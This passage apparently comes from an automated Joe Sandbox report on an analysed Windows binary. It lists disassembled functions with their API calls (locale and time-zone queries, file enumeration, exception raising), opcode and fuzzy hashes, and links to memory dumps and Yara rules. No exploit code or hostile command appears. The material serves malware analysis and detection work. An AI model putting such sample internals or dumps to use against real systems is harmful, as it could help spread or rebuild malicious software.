                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: __next_prime overflow
                                                  • API String ID: 0-822664188
                                                  • Opcode ID: 79ce4a4cd944e5f856cb7b1da9f3e62e905ff8e329447545397c7aeae28b7cb8
                                                  • Instruction ID: e64850d53f82a2810e24e1e86bb85b3fa6c5d53d5a9226dd2c9aaab79a89361e
                                                  • Opcode Fuzzy Hash: 79ce4a4cd944e5f856cb7b1da9f3e62e905ff8e329447545397c7aeae28b7cb8
                                                  • Instruction Fuzzy Hash: 9A02E771B006218FCB1CCD2CCCE566DB397ABA4300B18887ADD0EE7691D325EE5E8675
                                                  Function 00D85D0E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00D3529D), ref: 00D85F3B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 024f4ee3366e0f334507db17ea99d43fe25bc12d3a9a57c550769f2b6a6fc5d6
                                                  • Instruction ID: c8bd3220199ae007ad5d3e2b016880a70cf580057da3b1cbb577aeaaebac6964
                                                  • Opcode Fuzzy Hash: 024f4ee3366e0f334507db17ea99d43fe25bc12d3a9a57c550769f2b6a6fc5d6
                                                  • Instruction Fuzzy Hash: 39B16B31210A08CFD715DF28D48AB657BE0FF45364F298698E9DACF2A5C335EA91CB50
                                                  Function 00D7FF61 Relevance: 1.7, APIs: 1, Instructions: 158fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D800B0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00D8012B
                                                  • FindClose.KERNEL32(00000000), ref: 00D8014D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: e3cc858545367094fd384778a167fb22dd53f18a9f2da5128c461ee2b0271d9f
                                                  • Instruction ID: 13d49f837c0c049a2f26de9ba25fa02505af798bae299fcdd4c1a834ff0cbe2f
                                                  • Opcode Fuzzy Hash: e3cc858545367094fd384778a167fb22dd53f18a9f2da5128c461ee2b0271d9f
                                                  • Instruction Fuzzy Hash: 0541EA72600619AFDB24AF69CC85EBFB7A9EF85354F188169F90997141FA30DD088770
                                                  Function 00D746EC Relevance: 1.6, APIs: 1, Instructions: 140timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00D74BC2,?,-00000004), ref: 00D747A0
                                                    • Part of subcall function 00D810FA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D7A9B4,?,00000000,-00000008), ref: 00D8115B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ByteCharInformationMultiTimeWideZone
                                                  • String ID:
                                                  • API String ID: 1123094072-0
                                                  • Opcode ID: 90e06a4504bc9e6016d2a46351017e12f945047c2c59cbea7670a50d81dc0cf1
                                                  • Instruction ID: 2a700213a4f0cbf8e224538a648b46515e0d078850ef0cdc9663cd84179107e4
                                                  • Opcode Fuzzy Hash: 90e06a4504bc9e6016d2a46351017e12f945047c2c59cbea7670a50d81dc0cf1
                                                  • Instruction Fuzzy Hash: 4341E172900216BBCB11AFA5DC06E9E7BB8EF06350F148166F908E72A5E771DD10DBB0
                                                  Function 00D7F930 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7F984
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 8c1e9774439d67e231c60ef05947b6276e47ad543ee69d92fdefc1e8d6b4019f
                                                  • Instruction ID: 154e8bdc56bba5cbf9e30491689d56ca88a84368dac00ed3314ff1b64ec30690
                                                  • Opcode Fuzzy Hash: 8c1e9774439d67e231c60ef05947b6276e47ad543ee69d92fdefc1e8d6b4019f
                                                  • Instruction Fuzzy Hash: FB218072614206ABDB289B29DC52FBE77A8EF44315B14807AFA09D6141FB74DD408B70
                                                  Function 00D67287 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: bc7de97b680a081897dd2878e124aaebe0af1273937b06fd2b1ac5037dfddf7d
                                                  • Instruction ID: 46e6a1fdfd5277e9fcec73ba188f9e5cf89d8681eb1a26b07978347bd0a781bf
                                                  • Opcode Fuzzy Hash: bc7de97b680a081897dd2878e124aaebe0af1273937b06fd2b1ac5037dfddf7d
                                                  • Instruction Fuzzy Hash: 4EB1E370A0C60F8BCB24CF68C455ABEBBA1EF05308F18061DD9A297791DB35E905DBB1
                                                  Function 00D7F5C8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • EnumSystemLocalesW.KERNEL32(00D7F670,00000001,00000000,?,-00000050,?,00D7F453,00000000,-00000002,00000000,?,00000055,?), ref: 00D7F63A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 468cf6bcfae9e9f43132ed4113a19cadeb640fd33891f785992b35bd63e4b872
                                                  • Instruction ID: d50176e74ad41fca982095c94a641e6552fcb5627d94d4db2871a475bf6950e2
                                                  • Opcode Fuzzy Hash: 468cf6bcfae9e9f43132ed4113a19cadeb640fd33891f785992b35bd63e4b872
                                                  • Instruction Fuzzy Hash: 1211E9362007059FDB289F39C89157EB792FF84368B19843DE94B87750E7717942C760
                                                  Function 00D7FA50 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00D7FAA4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 0b7605d660246d51f9212da1f840f397b1274459c0604d0875cd919be570a018
                                                  • Instruction ID: 6d846fdacea9f205da979aadd77f52e8a7b509ea5bde77c37d30edca9cf688cc
                                                  • Opcode Fuzzy Hash: 0b7605d660246d51f9212da1f840f397b1274459c0604d0875cd919be570a018
                                                  • Instruction Fuzzy Hash: 9811C672510207ABDB24AB28DC42ABA77ACEF04320B14817AF509D7241FB78ED048770
                                                  Function 00D7FBFD Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00D7F88C,00000000,00000000,?), ref: 00D7FC29
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 6f00d4ca598e762ec7c2aea27c892140e0a345fdd034e7564e3f81f4a4d300b2
                                                  • Instruction ID: 8c14e324ef599a86f59f73c23327873913055a448e1271b0172f5ccbf41faf74
                                                  • Opcode Fuzzy Hash: 6f00d4ca598e762ec7c2aea27c892140e0a345fdd034e7564e3f81f4a4d300b2
                                                  • Instruction Fuzzy Hash: 1101DB32614116ABDB395B248C866BA3764DB40754F198439EC4AE3280FA74EE41C6B0
                                                  Function 00D67F18 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 04ce4e345e5c8b0f1f1ebbc10a9d1275271c545ad67e24eaf13d31670e0c56ed
                                                  • Instruction ID: d41e6360ddacbac6b8bdaf83f121648f6359d98944ad06898a4332ee1b650ffb
                                                  • Opcode Fuzzy Hash: 04ce4e345e5c8b0f1f1ebbc10a9d1275271c545ad67e24eaf13d31670e0c56ed
                                                  • Instruction Fuzzy Hash: D3B1CD3490474A8FCB24CF68C490AAABBB1FF09318F184B19D59697291CB35AD49EB71
                                                  Function 00D7F8C3 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • EnumSystemLocalesW.KERNEL32(00D7F930,00000001,00001002,?,-00000050,?,00D7F41B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00D7F90D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: e9305243f78516b04f33bdcb92c482700e3bb2b71de2756d8b562c002e0330d9
                                                  • Instruction ID: 9462c3cd22c9cb65e9e1953c2e3d3d5e5a11509ab27874cc907b8e804f584853
                                                  • Opcode Fuzzy Hash: e9305243f78516b04f33bdcb92c482700e3bb2b71de2756d8b562c002e0330d9
                                                  • Instruction Fuzzy Hash: 8FF0C8362003046FD7345F399881A6E7B91EF80768B09C43EFA4947650E7B15C02DB60
                                                  Function 00D7B8AD Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7B9B1: EnterCriticalSection.KERNEL32(-00099E16,?,00D6E3AB,00000000), ref: 00D7B9C0
                                                  • EnumSystemLocalesW.KERNEL32(00D7B8A0,00000001,00DBF3F0,0000000C,00D7B211,-00000050), ref: 00D7B8E5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: b30f7ed04f1f02b5fe23a3bf8e7f373ddc0124870ed4c4866a44e92f0e3bbfd7
                                                  • Instruction ID: 9d51465a319be440452b7f4cf4ff313606eaff64d2ce0f0c2dc998446b178287
                                                  • Opcode Fuzzy Hash: b30f7ed04f1f02b5fe23a3bf8e7f373ddc0124870ed4c4866a44e92f0e3bbfd7
                                                  • Instruction Fuzzy Hash: 02F03772A00315DFD700DF98E852B9D7BB0EB08720F10812AE515EB3A0DBB55A048FB0
                                                  Function 00D7FA05 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • EnumSystemLocalesW.KERNEL32(00D7FA50,00000001,00001002,?,?,00D7F475,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00D7FA3C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 2e0427f253dd3e924f09adb24d783bad8bde71855531b60891969e3c93830d61
                                                  • Instruction ID: d230eef17bcf97f2a707af3b47b080b166cafa70dc40bb5f2f77c88c0d4ff9c0
                                                  • Opcode Fuzzy Hash: 2e0427f253dd3e924f09adb24d783bad8bde71855531b60891969e3c93830d61
                                                  • Instruction Fuzzy Hash: A2F0E5363003059BCB249F39D85566ABFA4EFC1760B0AC069EA0ECB251E6759842C7B0
                                                  Function 00D7B36C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D6FE93,?,20001004,00000000,00000002,?,?,00D6EDA4), ref: 00D7B3A0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
